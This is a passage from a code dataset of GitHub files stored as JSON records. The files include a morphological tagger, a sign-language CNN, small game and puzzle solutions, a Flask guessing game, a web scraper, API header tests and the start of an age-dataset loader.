\", 1.0 - float(word_errors) / word_count)\n print(\"Sentence accuracy: \", 1.0 - float(sentence_errors) / sentence_count)\n\n def predict_probabilities(self, sentences: 
List[List[str]], batch_size: int,\n                              build_config: BuildModelConfig) -> List[List[List[float]]]:\n        \"\"\"\n        Predict full PoS tags for each sentence, with probabilities for every variant.\n\n        :param sentences: list of sentences (each one a list of words).\n        :param build_config: model architecture config.\n        :param batch_size: batch size.\n        :return: tag probabilities.\n        \"\"\"\n        max_sentence_len = max([len(sentence) for sentence in sentences])\n        if max_sentence_len == 0:\n            return [[] for _ in sentences]\n        n_samples = len(sentences)\n\n        words = np.zeros((n_samples, max_sentence_len), dtype=int)\n        grammemes = np.zeros((n_samples, max_sentence_len, self.grammeme_vectorizer_input.grammemes_count()),\n                             dtype=float)\n        chars = np.zeros((n_samples, max_sentence_len, build_config.char_max_word_length), dtype=int)\n\n        for i, sentence in enumerate(sentences):\n            if not sentence:\n                continue\n            word_indices, gram_vectors, char_vectors = BatchGenerator.get_sample(\n                sentence,\n                language=self.language,\n                converter=self.converter,\n                morph=self.morph,\n                grammeme_vectorizer=self.grammeme_vectorizer_input,\n                max_word_len=build_config.char_max_word_length,\n                word_vocabulary=self.word_vocabulary,\n                word_count=build_config.word_max_count,\n                char_set=self.char_set)\n            words[i, -len(sentence):] = word_indices\n            grammemes[i, -len(sentence):] = gram_vectors\n            chars[i, -len(sentence):] = char_vectors\n\n        inputs = []\n        if build_config.use_word_embeddings:\n            inputs.append(words)\n        if build_config.use_gram:\n            inputs.append(grammemes)\n        if build_config.use_chars:\n            inputs.append(chars)\n        return self.eval_model.predict(inputs, batch_size=batch_size)\n","repo_name":"IlyaGusev/rnnmorph","sub_path":"rnnmorph/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":19993,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"37"} +{"seq_id":"35137520636","text":"\"\"\"\n/*\tTurner Atwood\n *\t9/11/18\n *\tABC [1.7]: (https://open.kattis.com/problems/abc)\n */\t\n\"\"\"\n\ndef main():\n\tnums = sorted([int(i) for i in input().split(\" \")])\n\tletters = [i for i in input()]\n\tlet = ['A', 'B', 'C']\n\tletter_map = {let[i]:nums[i] for i in [0,1,2]}\n\tprint(\" \".join([str(letter_map[i]) for i in letters]))\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"TurnerAtwood/Kattis","sub_path":"Trivial/ABC.py","file_name":"ABC.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7418084859","text":"from turtle import Turtle\r\n\r\nALIGNMENT = 'center'\r\nFONT = ('Courier', 40, 'normal')\r\nFINAL_SCORE = 10\r\n\r\n\r\nclass ScoreBoard(Turtle):\r\n\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.r_score = 0\r\n        self.l_score = 0\r\n        self.color('white')\r\n        self.penup()\r\n        self.hideturtle()\r\n\r\n    def scores(self):\r\n        self.clear()\r\n        self.setpos(0, 275)\r\n        self.write('Score', align=ALIGNMENT, font=('Courier', 20, 'normal'))\r\n        self.setpos(2, 200)\r\n        self.write(f\"{self.l_score} : {self.r_score}\", align=ALIGNMENT, font=FONT)\r\n\r\n    def hit_a_r_score(self):\r\n        self.r_score += 1\r\n        self.scores()\r\n\r\n    def hit_a_l_score(self):\r\n        self.l_score += 1\r\n        self.scores()\r\n\r\n    def game_end(self):\r\n        if self.r_score == FINAL_SCORE:\r\n            self.setpos(0, 0)\r\n            self.write(\"Right player wins!\", align=ALIGNMENT, font=FONT)\r\n            return True\r\n\r\n        if self.l_score == FINAL_SCORE:\r\n            self.setpos(0, 0)\r\n            self.write(\"Left player wins!\", align=ALIGNMENT, 
font=FONT)\r\n return True\r\n","repo_name":"sandu-o-O/Pong-Ball","sub_path":"pongball_game/score_board.py","file_name":"score_board.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3616711203","text":"import numpy as np\nimport pandas as pd\nimport math\nimport string\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D , MaxPool2D , Flatten , Dropout , BatchNormalization\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report,confusion_matrix\nfrom keras.callbacks import ReduceLROnPlateau\n\nfrom sklearn.preprocessing import LabelBinarizer\n\n\nEPOCHS = 4\nCASES = {index:letter.upper() for index,letter in enumerate(string.ascii_lowercase)}\nMODEL_PATH = \"piccolo/model.pickle\"\nHISTORY_PATH = \"piccolo/history.pickle\"\n\n\n# creates test/train split\ndef train_test_split():\n train_df = pd.read_csv(\"./data/sign_mnist_train.csv\")\n test_df = pd.read_csv(\"./data/sign_mnist_test.csv\")\n y = test_df['label']\n y_train = train_df['label']\n y_test = test_df['label']\n del train_df['label']\n del test_df['label']\n x_train = train_df.values\n x_test = test_df.values\n\n return x_train, y_train, x_test, y_test, y\n\n\ndef preprocessing(x_train, y_train, x_test, y_test):\n # basically becomes a correct or not problem\n label_binarizer = LabelBinarizer()\n y_train = label_binarizer.fit_transform(y_train)\n y_test = label_binarizer.fit_transform(y_test)\n\n # normalizes range of RGB vals\n x_train = x_train / 255\n x_test = x_test / 255\n x_train = x_train.reshape(-1,28,28,1)\n x_test = x_test.reshape(-1,28,28,1)\n\n return x_train, y_train, x_test, y_test\n\n\ndef augment_data(x_train):\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\n zoom_range = 0.1, # Randomly zoom image \n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift images vertically (fraction of total height)\n horizontal_flip=False, # randomly flip images\n vertical_flip=False) # randomly flip images\n\n datagen.fit(x_train)\n\n return datagen\n\n\ndef train_cnn(x_train, y_train, x_test, y_test, extra_data, load_from=None):\n if not load_from:\n learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', patience = 2, verbose=1,factor=0.5, min_lr=0.00001)\n\n model = Sequential()\n model.add(Conv2D(75 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu' , input_shape = (28,28,1)))\n model.add(BatchNormalization())\n model.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\n model.add(Conv2D(50 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\n model.add(Dropout(0.2))\n model.add(BatchNormalization())\n model.add(MaxPool2D((2,2) , strides = 2 , padding = 'same'))\n model.add(Conv2D(25 , (3,3) , strides = 1 , padding = 'same' , activation = 'relu'))\n model.add(BatchNormalization())\n model.add(MaxPool2D((2,2) , strides = 2 , 
padding = 'same'))\n model.add(Flatten())\n model.add(Dense(units = 512 , activation = 'relu'))\n model.add(Dropout(0.3))\n model.add(Dense(units = 24 , activation = 'softmax'))\n model.compile(optimizer = 'adam' , loss = 'categorical_crossentropy' , metrics = ['accuracy'])\n model.summary()\n\n history = model.fit(extra_data.flow(x_train, y_train, batch_size = 128),\n epochs = EPOCHS, validation_data = (x_test, y_test) ,\n callbacks = [learning_rate_reduction])\n if load_from:\n # checks if the read fails\n success = read_model_history(model_path=load_from[0],\n history_path=load_from[1])\n if success:\n model, history = success[0], success[1]\n else:\n return train_cnn(x_train, y_train, x_test, y_test, extra_data)\n\n accuracy = model.evaluate(x_test, y_test)[1] * 100\n\n predictions = model.predict(x_test)\n\n return model, predictions, history, accuracy\n\n\ndef plot_preprocessed_images(images):\n width = 5\n height = math.ceil(len(images) / width)\n\n f, ax = plt.subplots(2,5) \n f.set_size_inches(10, 10)\n k = 0\n\n for i in range(height):\n for j in range(width):\n ax[i,j].imshow(images[k].reshape(28, 28) , cmap = \"gray\")\n k += 1\n plt.tight_layout()\n plt.show()\n\n\ndef show_accuracy_graph(model, history):\n epochs = [i for i in range(EPOCHS)]\n fig , ax = plt.subplots(1,2)\n train_acc = history.history['accuracy']\n train_loss = history.history['loss']\n val_acc = history.history['val_accuracy']\n val_loss = history.history['val_loss']\n fig.set_size_inches(16,9)\n\n ax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')\n ax[0].plot(epochs , val_acc , 'ro-' , label = 'Testing Accuracy')\n ax[0].set_title('Training & Validation Accuracy')\n ax[0].legend()\n ax[0].set_xlabel(\"Epochs\")\n ax[0].set_ylabel(\"Accuracy\")\n\n ax[1].plot(epochs , train_loss , 'g-o' , label = 'Training Loss')\n ax[1].plot(epochs , val_loss , 'r-o' , label = 'Testing Loss')\n ax[1].set_title('Testing Accuracy & Loss')\n ax[1].legend()\n ax[1].set_xlabel(\"Epochs\")\n ax[1].set_ylabel(\"Loss\")\n plt.show()\n\n\ndef show_confusion_matrix(y, predictions):\n cm = confusion_matrix(y, predictions)\n cm = pd.DataFrame(cm , index = [i for i in range(25) if i != 9] , columns = [i for i in range(25) if i != 9])\n plt.figure(figsize = (15,15))\n sns.heatmap(cm,cmap= \"Blues\", linecolor = 'black' , linewidth = 1 , annot = True, fmt='')\n\n\ndef show_predicted_to_correct_classes(x_test, y, predictions, count=6):\n correct = np.nonzero(predictions == y)[0]\n\n i = 0\n for c in correct[:count]:\n plt.subplot(3,2,i+1)\n plt.imshow(x_test[c].reshape(28,28), cmap=\"gray\", interpolation='none')\n plt.title(\"Predicted {}/Actual {}\".format(CASES[predictions[c]], CASES[y[c]]))\n plt.tight_layout()\n i += 1\n plt.show()\n \n\ndef save_model_history(model, history, model_path=\"model.model\",\n history_path=\"history.history\"):\n # model\n model.save(model_path)\n\n # history\n with open(history_path, \"wb\") as f:\n pickle.dump(history, f)\n\n\ndef read_model_history(model_path=\"model.model\",\n history_path=\"history.history\"):\n try:\n # model\n model = keras.models.load_model(model_path)\n\n # history\n with open(history_path, \"rb\") as f:\n history = pickle.load(f)\n\n return model, history\n except FileNotFoundError:\n return None\n\n\ndef main():\n # preprocessing\n data = list(train_test_split())\n\n # extracts y\n y = data[4]\n del data[4]\n\n data = preprocessing(*data)\n extra_data = augment_data(data[0])\n\n # plot_images(data[0][:10])\n load_from = (MODEL_PATH, HISTORY_PATH)\n # load_from 
= None\n \n # the actual training\n model, predictions, history, accuracy = train_cnn(*data, extra_data,\n load_from=load_from)\n\n # saves model/history\n save_model_history(model, history, model_path=MODEL_PATH,\n history_path=HISTORY_PATH)\n\n # shows graphs\n # show_accuracy_graph(model, history)\n # show_confusion_matrix(y, predictions)\n # show_predicted_to_correct_classes(data[2], y, predictions)\n\n\nclass RoverCNN:\n CASES = {index:letter.upper() for index,letter in enumerate(string.ascii_lowercase)}\n\n\n def __init__(self,\n epochs = 4,\n model_path = \"piccolo/model.pickle\",\n history_path = \"piccolo/history.pickle\",\n ):\n # config vals\n self.epochs = epochs\n self.model_path = model_path\n self.history_path = history_path\n\n # gets train/test data\n self.x_train, self.y_train, self.x_test, self.y_test, self.y = train_test_split()\n # preprocesses it\n self.x_train, self.y_train, self.x_test, self.y_test = preprocessing(*self.data)\n\n # # data augmentation\n self.extra_data = augment_data(self.x_train)\n # plt.imshow(self.x_train[0], interpolation='nearest')\n # plt.show()\n\n self.get_model()\n\n\n @property\n def data(self):\n return [self.x_train, self.y_train, self.x_test, self.y_test]\n\n def get_model(self):\n self.model, self.predictions, self.history, self.accuracy = \\\n train_cnn(*self.data, self.extra_data, load_from=(self.model_path,\n self.history_path))\n\n def save(self):\n save_model_history(self.model, self.history,\n model_path=self.model_path,\n history_path=self.history_path)\n\n def predict(self, image):\n print(\"PREDICTOR\", image.shape, len(image))\n processed_image = image / 255\n processed_image = processed_image.reshape(-1,28,28,1)\n # processed_image = processed_image.reshape(1920,480,1)\n results = self.model.predict(processed_image)[0]\n return CASES[list(results).index(max(results))]\n\n def show_graphs(self):\n show_accuracy_graph(self.model, self.history)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Zaqttack/hackrover.tech-ml","sub_path":"rover_cnn.py","file_name":"rover_cnn.py","file_ext":"py","file_size_in_byte":9702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074631788","text":"import unittest\nimport requests\nfrom utils.common.config_loader import ConfigLoader\nfrom luna_admin.crutches_on_wheels.utils.regexps import REQUEST_ID_REGEXP\nfrom time import time, timezone\n\n\nLPS_ADMIN_URL = ConfigLoader.get_admin_url()\n\n\nclass TestHeaders(unittest.TestCase):\n \"\"\"\n Test headers\n \"\"\"\n def test_check_custom_luna_req_id(self):\n \"\"\"\n .. test:: test_check_custom_luna_req_id\n\n :resources: \"/\"\n :description: success setting LUNA-Request-Id\n :LIS: No\n :tag: Headers\n \"\"\"\n requestId = \"{},{}\".format(int(time()), \"11111111-1111-4a11-8111-111111111111\")\n replyInfo = requests.get(url=LPS_ADMIN_URL, headers={\"LUNA-Request-Id\": requestId})\n self.assertEqual(replyInfo.headers[\"LUNA-Request-Id\"], requestId)\n\n def test_check_luna_req_id(self):\n \"\"\"\n .. 
test:: test_check_luna_req_id\n\n :description: success getting LUNA-Request-Id\n :LIS: No\n :tag: Headers\n :resources: \"/\"\n \"\"\"\n replyInfo = requests.get(url=LPS_ADMIN_URL)\n self.assertIn(\"LUNA-Request-Id\", replyInfo.headers)\n rid = replyInfo.headers['LUNA-Request-Id']\n requestId = rid.split(\",\")\n self.assertTrue(abs(time()-timezone-int(requestId[0])) < 2, \"too much difference between time\")\n self.assertEqual(len(requestId[1]), 36)\n\n def test_check_custom_bad_luna_req_id(self):\n\n \"\"\"\n .. test:: test_check_custom_bad_luna_req_id\n\n :resources: \"/\"\n :description: bad setting LUNA-Request-Id\n :LIS: No\n :tag: Headers\n \"\"\"\n requestId = \"{},{}\".format(int(time()), \"11111111-1111-4a11-8111-111111111111x\")\n replyInfo = requests.get(url = LPS_ADMIN_URL, headers = {\"LUNA-Request-Id\": requestId})\n self.assertTrue(replyInfo.headers[\"LUNA-Request-Id\"] != requestId)\n self.assertTrue(REQUEST_ID_REGEXP.match(replyInfo.headers[\"LUNA-Request-Id\"]) is not None)\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/tests/tests_api/unitests_headers.py","file_name":"unitests_headers.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41850837963","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom utils.scalex_toolkit import ScaleXToolkit, get_unit\n\n\nclass AwaserToolkit(ScaleXToolkit):\n FIBER_HOME_URL = \"https://awasr.om/en/package/journey/ZVANH\"\n\n def get_download_speed(self, scope_html):\n download_speed_value = scope_html.select_one(\"span.currency\")\n dwonload_speed_unit = scope_html.select_one(\"span.mo\")\n download_speed = {\"value\": float(\n download_speed_value.text), \"unit\": get_unit(dwonload_speed_unit.text)}\n return self.unify_unit(download_speed)\n\n def get_price(self, scope_html):\n price = scope_html.select_one(\"p.price\")\n return self.split_value_and_unit(self.clear_string(price.text))\n\n def get_other(self, scope_html):\n other = []\n promotions = scope_html.select_one(\n \"div.service-plan-content.text-direction\")\n li = promotions.find_all(\"li\")\n for l in li:\n if \"Get Increased\" not in l.text:\n other.append(self.clear_string(l.text))\n return other\n\n def get_soup(self, URL):\n res = requests.get(URL)\n txt = res.text\n soup = BeautifulSoup(txt, features=\"html.parser\")\n return soup\n","repo_name":"alkuyomisb/scalex_engine","sub_path":"data/web_scrapping/isp/awaser/awaser_tookit.py","file_name":"awaser_tookit.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"49951499","text":"#!/usr/bin/python3\n\"\"\"This module Write a class Square that defines a square\"\"\"\n\n\nclass Square:\n \"\"\"Simple class of a square\"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Initialize the square.\n\n Arg:\n size (int): size of the square.\n position (tuple): position of the square\n \"\"\"\n\n self.__size = size\n self.__position = position\n\n @property\n def size(self):\n \"\"\"Make getter for my square size\"\"\"\n return (self.__size)\n\n @size.setter\n def size(self, value):\n \"\"\"setter for size.\n\n Arg:\n value (int): value to set size of the square.\n \"\"\"\n\n if type(value) is int and value >= 0:\n self.__size = value\n elif type(value) is not int:\n raise TypeError(\"size must be an integer\")\n elif value < 0:\n raise ValueError(\"size must be >= 0\")\n\n @property\n def 
position(self):\n        \"\"\"Make getter for my square position\"\"\"\n        return (self.__position)\n\n    @position.setter\n    def position(self, value):\n        \"\"\"setter for position.\n\n        Arg:\n            value (tuple): value to set the position of the square.\n        \"\"\"\n\n        if (type(value) is tuple and len(value) == 2\n                and isinstance(value[0], int) and isinstance(value[1], int)\n                and value[0] >= 0 and value[1] >= 0):\n            self.__position = value\n        else:\n            raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n    def area(self):\n        \"\"\"Compute the square\n\n        Returns:\n            int: current square area\n        \"\"\"\n        return (self.__size * self.__size)\n\n    def my_print(self):\n        \"\"\" prints in stdout the square with the character #\"\"\"\n        if self.__size > 0:\n            for y in range(0, self.__position[1]):\n                print()\n            for a in range(0, self.__size):\n                print(\" \" * self.__position[0], end=\"\")\n                for b in range(0, self.__size):\n                    print(\"#\", end=\"\")\n                print()\n        elif self.__size == 0:\n            print()\n","repo_name":"samuelolushegun/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41232915470","text":"'''Time limit exceeded'''\nimport sys, copy\n\ninput = sys.stdin.readline\nm, s = map(int, input().split())\nfishes = []\nfor _ in range(m):\n    x, y, d = list(map(int, input().split()))\n    fishes.append([x-1, y-1, d-1])\n\ncp_fishes = []\nshark_pos = list(map(int, input().split())) \nshark_pos = shark_pos[0]-1, shark_pos[1]-1\n\nspace, smell = [], [] \nfor i in range(4):\n    line_1, line_2 = [], []\n    for j in range(4):\n        line_1.append([])\n        line_2.append([])\n    space.append(line_1)\n    smell.append(line_2)\n\nfish_direction = [(0,-1), (-1,-1), (-1,0), (-1,1), (0,1), (1,1), (1,0), (1,-1)]\nshark_direction = [(-1,0), (0,-1), (1,0), (0,1)]\n\ndef fish_move(): \n    size = len(fishes)\n    for _ in range(size):\n        x, y, d = fishes.pop(0)\n        for i in range(8):\n            nx, ny = x + fish_direction[d-i][0], y + fish_direction[d-i][1]\n            if (0 <= nx and nx < 4 and 0 <= ny and ny < 4) and shark_pos != [nx,ny] and not smell[nx][ny]:\n                # move\n                space[x][y].remove(d)\n                space[nx][ny].append((d-i)%8)\n                fishes.append([nx, ny, (d-i)%8])\n                break\n        else:\n            fishes.append([x, y, d])\n\ndef dfs(cases, x, y, depth, path, path_fishes, visited):\n    if depth == 3:\n        cases.append([\"\".join(path), path_fishes])\n        return\n\n    for i in range(4):\n        nx, ny = x + shark_direction[i][0], y + shark_direction[i][1]\n\n        if 0 <= nx < 4 and 0 <= ny < 4:\n            if not visited[nx][ny]:\n                visited[nx][ny] = True\n                temp = []\n                for f in space[nx][ny]:\n                    temp.append(f)\n                dfs(cases, nx, ny, depth+1, path+[str(i+1)], path_fishes+len(temp), visited) \n                visited[nx][ny] = False\n            else:\n                dfs(cases, nx, ny, depth+1, path+[str(i+1)], path_fishes, visited)\n    \ndef shark_move(idx):\n    global shark_pos\n    path = []\n    cases = []\n    x, y = shark_pos[0], shark_pos[1]\n    visited = [[0]*4 for _ in range(4)]\n\n    dfs(cases, x,y,0,[],0,visited)\n    cases.sort(key=lambda x: (-x[1], x[0]))\n\n    x, y = shark_pos[0], shark_pos[1]\n    path = list(cases[0][0])\n    for i, p in enumerate(path):\n        p = int(p)-1\n        nx, ny = x + shark_direction[p][0], y + shark_direction[p][1]\n        x, y = nx, ny\n        if 0 < len(space[x][y]):\n            smell[x][y].append(idx)\n            space[x][y] = []\n            remove_list = []\n            for f in fishes:\n                if [f[0],f[1]] == [x,y]:\n                    remove_list.append(f)\n            for r in remove_list:\n                fishes.remove(r)\n        \n        if i == 2:\n            shark_pos = [x,y]\n\ndef duplicate(idx):\n    
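# snapshot the fish present at the start of this turn; the copies are re-added in step 4 below\n    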
cp_fishes = copy.deepcopy(fishes)\n    # 1. all fish move one cell\n    fish_move()\n    # 2. the shark moves\n    shark_move(idx)\n    # 3. fish smell disappears\n    for i in range(4):\n        for j in range(4):\n            if idx-2 in smell[i][j]:\n                smell[i][j].remove(idx-2)\n    # 4. spawn the copied fish\n    for x, y, d in cp_fishes:\n        space[x][y].append(d)\n        fishes.append([x,y,d])\n\ndef count_fishes():\n    cnt = 0\n    for i in range(4):\n        for j in range(4):\n            cnt += len(space[i][j])\n    return cnt\n\n# main\nfor x, y, d in fishes:\n    space[x][y].append(d)\n\nfor i in range(s):\n    duplicate(i)\n    \nprint(count_fishes())\n\n'''other solution'''\nimport sys, copy\n\ninput = sys.stdin.readline\nm, s = map(int, input().split())\nfish = [list(map(int, input().split())) for _ in range(m)]\nspace = [[[] for _ in range(4)] for _ in range(4)]\n\nfor x, y, d in fish:\n    space[x - 1][y - 1].append(d - 1)\n\nshark = tuple(map(lambda x: int(x) - 1, input().split()))\nsmell = [[0] * 4 for _ in range(4)]\n\nf_dx = [0, -1, -1, -1, 0, 1, 1, 1]\nf_dy = [-1, -1, 0, 1, 1, 1, 0, -1]\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\ndef move_fish():\n    res = [[[] for _ in range(4)] for _ in range(4)]\n    for x in range(4):\n        for y in range(4):\n            while temp[x][y]:\n                d = temp[x][y].pop()\n                for i in range(d, d - 8, -1):\n                    i %= 8\n                    nx, ny = x + f_dx[i], y + f_dy[i]\n                    if (nx, ny) != shark and 0 <= nx < 4 and 0 <= ny < 4 and not smell[nx][ny]:\n                        res[nx][ny].append(i)\n                        break\n                else:\n                    res[x][y].append(d)\n    return res\n\ndef dfs(x, y, dep, cnt, visit):\n    global max_eat, shark, eat\n    if dep == 3: \n        if max_eat < cnt:\n            max_eat = cnt\n            shark = (x, y)\n            eat = visit[:]\n        return\n    for d in range(4):\n        nx = x + dx[d]\n        ny = y + dy[d]\n        if 0 <= nx < 4 and 0 <= ny < 4:\n            if (nx, ny) not in visit: \n                visit.append((nx, ny))\n                dfs(nx, ny, dep + 1, cnt + len(temp[nx][ny]), visit)\n                visit.pop()\n            else: \n                dfs(nx, ny, dep + 1, cnt, visit)\n\nfor _ in range(s):\n    eat = list()\n    max_eat = -1\n    # 1. copy all fish\n    temp = copy.deepcopy(space)\n    # 2. move the fish\n    temp = move_fish()\n    # 3. shark move - backtracking\n    dfs(shark[0], shark[1],0, 0, list())\n    # 4. smell disappears \n    for i in range(4):\n        for j in range(4):\n            if smell[i][j]:\n                smell[i][j] -= 1\n    for x, y in eat:\n        if temp[x][y]:\n            temp[x][y] = []\n            smell[x][y] = 2 \n    # 5. 
replication magic\n    for i in range(4):\n        for j in range(4):\n            space[i][j] += temp[i][j]\n\n# count the fish \nanswer = 0\nfor i in range(4):\n    for j in range(4):\n        answer += len(space[i][j])\n\nprint(answer)","repo_name":"suzyrhkr/Algorithm-PS","sub_path":"samsung-sw/마법사상어와복제.py","file_name":"마법사상어와복제.py","file_ext":"py","file_size_in_byte":5716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24127617040","text":"from flask import Flask, render_template, request, redirect, session\nimport random\napp = Flask(__name__)\napp.secret_key = \"number_game\"\n@app.route(\"/\") #display route, for index\ndef index():\n    # all functions must return a redirect or a render_template at the end of them to exit the function\n    #checks to see if there is a random number in session\n    if \"win_number\" not in session:\n        #if there isn't, then make a random number\n        session[\"win_number\"] = random.randint(1,101)\n    elif \"guess\" in session and session[\"win_number\"] == session[\"guess\"]:\n        #if the number was guessed, then pop all things stored in session\n        session.pop(\"win_number\")\n        session.pop(\"guess\")\n        session.pop(\"test\")\n        return redirect(\"/\") #redirect to index\n    return render_template(\"index.html\")\n@app.route(\"/guess\", methods=[\"POST\"]) #calculations route\ndef guess():\n    session[\"guess\"] = int(request.form[\"guess\"]) # this is setting the guess provided from the user form and storing it into session, also changes the input to an int\n    if session[\"guess\"] == session[\"win_number\"]: #\n        session[\"test\"] = \"Congrats! \" + str(session[\"win_number\"]) + \" was the number!\" # if the guess is right then print out a string and display the Play Again\n        # button from the index.html\n        return redirect(\"/repeat\") # redirect to /repeat which renders template of index again\n    if session[\"guess\"] > session[\"win_number\"]: # if the guess is higher than the win number, then test will print \"too high\"\n        session[\"test\"] = \"Too High!\"\n    if session[\"guess\"] < session[\"win_number\"]: # if the guess is lower than the win number, then test will print \"too low\"\n        session[\"test\"] = \"Too Low!\"\n    return redirect(\"/\") # redirect back to index to show the hint\n@app.route(\"/repeat\") #display route\ndef repeat():\n    return render_template(\"index.html\")# renders template of index again\napp.run(debug=True)\n","repo_name":"jackiethind/DojoAssignments","sub_path":"Python/Flask_Fundamentals/great_number_game/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074631788","text":"import os, sys, shutil, csv\nimport random as rd\nfrom PIL import Image\nimport numpy as np\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nfrom torch.autograd import Variable\nfrom torch.nn.modules.loss import _WeightedLoss\nimport random\nimport cv2\nimport imgaug as ia\nimport imgaug.augmenters as iaa\n\nRootDir = {'C':'/ssd2/baozenghao/data/Age/CACD/CACD2000_arccropped/',\n           'E':'/ssd1/data/face/age_data/data/MegaAge/megaage_asian_arccropped/',\n           'I':'/ssd1/baozenghao/data/IMDB-WIKI/',\n           'LO':'/ssd2/baozenghao/data/Age/CLAP16/CLAP16_arccrop/',\n           'L':'/ssd2/baozenghao/data/Age/CLAP16/CLAP16_arccrop/train/',\n           'LT':'/ssd2/baozenghao/data/Age/CLAP16/train/',\n           'MS': '/ssd2/data/face/MS_Celeb_1M/imgs',\n           'G': '/ssd2/data/face/Glint360k/imgs',\n           
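# one-letter dataset keys: C=CACD, E=MegaAge-Asian, I=IMDB-WIKI, LO/L/LT=CLAP16, MS=MS-Celeb-1M, G=Glint360k, M=Morph, U=UTKFace\n           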
'M':'/ssd1/data/face/age_data/data/Morph/Album2_arccropped/',\n 'U': '/ssd1/data/face/age_data/data/UTKFace/UTKFACE_arccropped/'}\n\nAllTrain = {'C': '/ssd2/baozenghao/data/Age/CACD/txt/big_noise_images_shuffle_renamed.txt',\n 'E': '/ssd1/data/face/age_data/data/MegaAge/txt/MegaAge_Asian_train.txt',\n 'I': '/ssd1/baozenghao/data/IMDB-WIKI/txt/imdb_wiki_CLEAN_train.txt',\n 'L': '/ssd2/baozenghao/data/Age/CLAP16/txt/train.txt',\n 'LT': '/ssd2/baozenghao/data/Age/CLAP16/txt/train.txt',\n 'MS': '/ssd2/data/face/MS_Celeb_1M/txt/list.txt',\n 'G': '/ssd2/data/face/Glint360k/txt/list.txt',\n 'M': '/ssd1/data/face/age_data/data/Morph/txt/RANDOM_80_20/morph_random_80_20_train.txt',\n 'U': '/ssd1/data/face/age_data/data/UTKFace/txt/utkface_train.txt'}\n\nAllTest = {'C': '/ssd2/baozenghao/data/Age/CACD/txt/small_noise_images_rank345_renamed.txt',\n 'E': '/ssd1/data/face/age_data/data/MegaAge/txt/MegaAge_Asian_test.txt',\n 'I': '/ssd1/baozenghao/data/IMDB-WIKI/txt/imdb_wiki_CLEAN_test.txt',\n 'LO': '/ssd2/baozenghao/data/Age/CLAP16/txt/chalearn16_AG_test.txt',\n 'LT': '/ssd2/baozenghao/data/Age/CLAP16/txt/chalearn16_AG_test.txt',\n 'M': '/ssd1/data/face/age_data/data/Morph/txt/RANDOM_80_20/morph_random_80_20_test.txt',\n 'U': '/ssd1/data/face/age_data/data/UTKFace/txt/utkface_test.txt'}\n\nrootdir = '/ssd2/baozenghao/data/Age/MIVIA/caip_arccropped'\ntrainlist = '/ssd2/baozenghao/data/Age/MIVIA/MIVIA_train.csv'\n# trainlist = '/ssd2/baozenghao/data/Age/MIVIA/training_caip_contest.csv'\ntestlist = '/ssd2/baozenghao/data/Age/MIVIA/MIVIA_test.csv'\n# testlist = '/bzh/test.csv'\n\n#cutout transform\nclass CutoutDefault(object):\n \"\"\"\n Apply cutout transformation.\n Code taken from: https://github.com/quark0/darts/blob/master/cnn/utils.py\n \"\"\"\n def __init__(self, length):\n self.length = length\n\n def __call__(self, img):\n h, w = img.size(1), img.size(2)\n mask = np.ones((h, w), np.float32)\n y = np.random.randint(h)\n x = np.random.randint(w)\n\n y1 = np.clip(y - self.length // 2, 0, h)\n y2 = np.clip(y + self.length // 2, 0, h)\n x1 = np.clip(x - self.length // 2, 0, w)\n x2 = np.clip(x + self.length // 2, 0, w)\n\n mask[y1: y2, x1: x2] = 0.\n mask = torch.from_numpy(mask)\n mask = mask.expand_as(img)\n img *= mask\n return img\n\ndef loadcsv(data_dir, file):\n imgs = list()\n with open(file, mode='r') as csv_file:\n gt = csv.reader(csv_file, delimiter=',')\n for row in gt:\n img_name, age = row[0], row[1]\n img_path = os.path.join(data_dir, img_name)\n age = int(round(float(age)))\n imgs.append((img_path, age))\n return imgs\n\n# def loadclass(data_dir, file):\n\n\ndef loadrank(data_dir, file, 